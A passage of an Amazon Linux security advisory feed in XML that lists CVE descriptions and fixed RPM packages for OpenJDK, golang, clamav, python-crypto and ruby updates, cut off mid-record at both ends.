Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534288:
CVE-2018-2677 OpenJDK: unbounded memory allocation during deserialization (AWT, 8190289)
CVE-2018-2663:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534296:
CVE-2018-2663 OpenJDK: ArrayBlockingQueue deserialization to an inconsistent state (Libraries, 8189284)
CVE-2018-2641:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N).
1534766:
CVE-2018-2641 OpenJDK: GTK library loading use-after-free (AWT, 8185325)
CVE-2018-2637:
It was discovered that the JMX component of OpenJDK failed to properly set the deserialization filter for the SingleEntryRegistry in certain cases. A remote attacker could possibly use this flaw to bypass intended deserialization restrictions.
1534970:
CVE-2018-2637 OpenJDK: SingleEntryRegistry incorrect setup of deserialization filter (JMX, 8186998)
CVE-2018-2634:
The JGSS component of OpenJDK ignores the value of the javax.security.auth.useSubjectCredsOnly property when using HTTP/SPNEGO authentication and always uses global credentials. It was discovered that this could cause global credentials to be unexpectedly used by an untrusted Java application.
1534943:
CVE-2018-2634 OpenJDK: use of global credentials for HTTP/SPNEGO (JGSS, 8186600)
CVE-2018-2633:
It was discovered that the LDAPCertStore class in the JNDI component of OpenJDK failed to securely handle LDAP referrals. An attacker could possibly use this flaw to make it fetch attacker controlled certificate data.
1535036:
CVE-2018-2633 OpenJDK: LDAPCertStore insecure handling of LDAP referrals (JNDI, 8186606)
CVE-2018-2629:
It was discovered that the JGSS component of OpenJDK failed to properly handle GSS context in the native GSS library wrapper in certain cases. A remote attacker could possibly make a Java application using JGSS to use a previously freed context.
1534625:
CVE-2018-2629 OpenJDK: GSS context use-after-free (JGSS, 8186212)
CVE-2018-2618:
It was discovered that the key agreement implementations in the JCE component of OpenJDK did not guarantee sufficient strength of used keys to adequately protect generated shared secret. This could make it easier to break data encryption by attacking key agreement rather than the encryption using the negotiated secret.
1534762:
CVE-2018-2618 OpenJDK: insufficient strength of key agreement (JCE, 8185292)
CVE-2018-2603:
It was discovered that the Libraries component of OpenJDK failed to sufficiently limit the amount of memory allocated when reading DER encoded input. A remote attacker could possibly use this flaw to make a Java application use an excessive amount of memory if it parsed attacker supplied DER encoded input.
1534553:
CVE-2018-2603 OpenJDK: DerValue unbounded memory allocation (Libraries, 8182387)
CVE-2018-2602:
It was discovered that the I18n component of OpenJDK could use an untrusted search path when loading resource bundle classes. A local attacker could possibly use this flaw to execute arbitrary code as another local user by making their Java application load an attacker controlled class file.
1534525:
CVE-2018-2602 OpenJDK: loading of classes from untrusted locations (I18n, 8182601)
CVE-2018-2599:
It was discovered that the DNS client implementation in the JNDI component of OpenJDK did not use random source ports when sending out DNS queries. This could make it easier for a remote attacker to spoof responses to those queries.
1534543:
CVE-2018-2599 OpenJDK: DnsClient missing source port randomization (JNDI, 8182125)
CVE-2018-2588:
It was discovered that the LDAP component of OpenJDK failed to properly encode special characters in user names when adding them to an LDAP search query. A remote attacker could possibly use this flaw to manipulate LDAP queries performed by the LdapLoginModule class.
1534299:
CVE-2018-2588 OpenJDK: LdapLoginModule insufficient username encoding in LDAP query (LDAP, 8178449)
CVE-2018-2579:
It was discovered that multiple encryption key classes in the Libraries component of OpenJDK did not properly synchronize access to their internal data. This could possibly cause a multi-threaded Java application to apply weak encryption to data because of the use of a key that was zeroed out.
1534298:
CVE-2018-2579 OpenJDK: unsynchronized access to encryption key data (Libraries, 8172525)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2579" title="" id="CVE-2018-2579" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2588" title="" id="CVE-2018-2588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2599" title="" id="CVE-2018-2599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2602" title="" id="CVE-2018-2602" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2603" title="" id="CVE-2018-2603" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2618" title="" id="CVE-2018-2618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2629" title="" id="CVE-2018-2629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2633" title="" id="CVE-2018-2633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2634" title="" id="CVE-2018-2634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2637" title="" id="CVE-2018-2637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2641" title="" id="CVE-2018-2641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2663" title="" id="CVE-2018-2663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2677" title="" id="CVE-2018-2677" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2678" title="" id="CVE-2018-2678" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.171-2.6.13.0.76.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.171-2.6.13.0.76.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.171" release="2.6.13.0.76.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.171-2.6.13.0.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-975</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-975: medium priority package update for golang</title><issued date="2018-03-21 22:13:00" /><updated date="2018-04-19 22:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7187:
The &quot;go get&quot; implementation in Go 1.9.4, when the -insecure command-line option is used, does not validate the import path (get/vcs.go only checks for &quot;://&quot; anywhere in the string), which allows remote attackers to execute arbitrary OS commands via a crafted web site.
1546386:
CVE-2018-7187 golang: arbitrary command execution via VCS path
CVE-2018-6574:
An arbitrary command execution flaw was found in the way Go&#039;s &quot;go get&quot; command handled gcc and clang sensitive options during the build. A remote attacker capable of hosting malicious repositories could potentially use this flaw to cause arbitrary command execution on the client side.
1543561:
CVE-2018-6574 golang: arbitrary code execution during "go get" via C compiler options
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6574" title="" id="CVE-2018-6574" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7187" title="" id="CVE-2018-7187" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-tests" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.9.4" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.9.4-2.44.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.9.4" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.9.4-2.44.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.9.4" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.9.4-2.44.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.9.4" release="2.44.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.9.4-2.44.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.9.4" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.9.4-2.44.amzn1.i686.rpm</filename></package><package name="golang" version="1.9.4" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.9.4-2.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-976</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-976: medium priority package update for clamav</title><issued date="2018-03-21 22:24:00" /><updated date="2018-03-23 17:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000085:
CVE-2018-0202:
CVE-2017-6419:
mspack/lzxd.c in libmspack 0.5alpha, as used in ClamAV 0.99.2, allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted CHM file.
1483909:
CVE-2017-6419 libmspack, clamav: heap-based buffer overflow in mspack/lzxd.c
CVE-2017-11423:
The cabd_read_string function in mspack/cabd.c in libmspack 0.5alpha, as used in ClamAV 0.99.2 and other products, allows remote attackers to cause a denial of service (stack-based buffer over-read and application crash) via a crafted CAB file.
1472776:
CVE-2017-11423 libmspack, clamav: Stack-based buffer over-read in cabd_read_string function
CVE-2012-6706:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6706" title="" id="CVE-2012-6706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11423" title="" id="CVE-2017-11423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6419" title="" id="CVE-2017-6419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0202" title="" id="CVE-2018-0202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000085" title="" id="CVE-2018-1000085" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter-sysvinit" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-server-sysvinit" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-server" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-data-empty" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-debuginfo" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-scanner" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.99.4" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.99.4-1.29.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.99.4" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.99.4-1.29.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamd" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.99.4-1.29.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.99.4" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.99.4-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-977</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-977: medium priority package update for python-crypto</title><issued date="2018-03-21 22:26:00" /><updated date="2018-03-23 17:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6594:
lib/Crypto/PublicKey/ElGamal.py in PyCrypto through 2.6.1 generates weak ElGamal key parameters, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for PyCrypto&#039;s ElGamal implementation.
1542313:
CVE-2018-6594 python-crypto: Weak ElGamal key parameters in PublicKey/ElGamal.py allow attackers to obtain sensitive information by reading ciphertext
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6594" title="" id="CVE-2018-6594" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-crypto-2.6.1-1.15.amzn1.x86_64.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-crypto-2.6.1-1.15.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.6.1-1.15.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.6.1-1.15.amzn1.i686.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python27-crypto-2.6.1-1.15.amzn1.i686.rpm</filename></package><package name="python26-crypto" version="2.6.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/python26-crypto-2.6.1-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-978</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-978: medium priority package update for ruby24 ruby22 ruby23</title><issued date="2018-03-21 22:27:00" /><updated date="2018-03-23 17:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-0903:
A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter.
1500488:
CVE-2017-0903 rubygems: Unsafe object deserialization through YAML formatted gem specifications
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0903" title="" id="CVE-2017-0903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22-doc" version="2.2.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.9-1.10.amzn1.noarch.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8.1-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.9-1.10.amzn1.noarch.rpm</filename></package><package name="ruby22-devel" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby22" version="2.2.9" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.9-1.10.amzn1.x86_64.rpm</filename></package><package name="rubygems22-devel" version="2.4.5.2" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.2-1.10.amzn1.noarch.rpm</filename></package><package name="rubygems22" version="2.4.5.2" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.2-1.10.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.10.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.10.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8.1-1.10.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.9" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.9-1.10.amzn1.i686.rpm</filename></package><package name="ruby24-doc" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.3-1.30.5.amzn1.noarch.rpm</filename></package><package name="rubygems24-devel" version="2.6.14" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14-1.30.5.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.3-1.30.5.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.14" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14-1.30.5.amzn1.noarch.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.5.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.3-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.5.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.5.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.5.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.0" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.0-1.30.5.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.3" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.3-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.5.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23" 